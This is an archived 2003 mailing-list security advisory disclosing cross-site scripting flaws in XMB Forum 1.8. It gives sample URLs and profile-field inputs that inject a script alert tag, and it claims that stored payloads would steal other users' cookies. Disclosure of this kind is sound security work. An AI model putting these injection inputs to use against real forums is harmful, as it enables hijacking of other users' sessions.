Many XSS Vulnerabilities in XMB Forum.

From: Knight Commander (knight4vnat_private)
Date: Sun Jun 22 2003 - 20:53:36 PDT

Next message: François SORIN: "[KSA-001] Multiple vulnerabilities in Tutos"

Previous message: eipat_private-ip.com: "Myserver 0.4.1 DOS.."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Many XSS Vulnerabilities in XMB Forum. Program Name : XMB Forum AffectedVersion : 1.8 Partagium (may be the newest version) Home Page : http://www.xmbforum.com Author : Knight Commander (at hackervn.net) +Vul: In this link: http://pathto/XMBforum/member.php?action=viewpro&member=admin<script>alert ('XSS')</script> and http://pathto/XMBforum/buddy.php?action=<script>alert('XSS') </script>&buddy=<script>alert('XSS')</script> or in your profiles: just fill in MSN and Current Mood 's text box: <script>alert('XSS') </script> when the others view your profiles, their cookies will be stolen. Solution: Vendor was contacted.The new version will be released soon. Regards! email: knight4vnat_private

Next message: François SORIN: "[KSA-001] Multiple vulnerabilities in Tutos"
Previous message: eipat_private-ip.com: "Myserver 0.4.1 DOS.."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jun 23 2003 - 09:57:08 PDT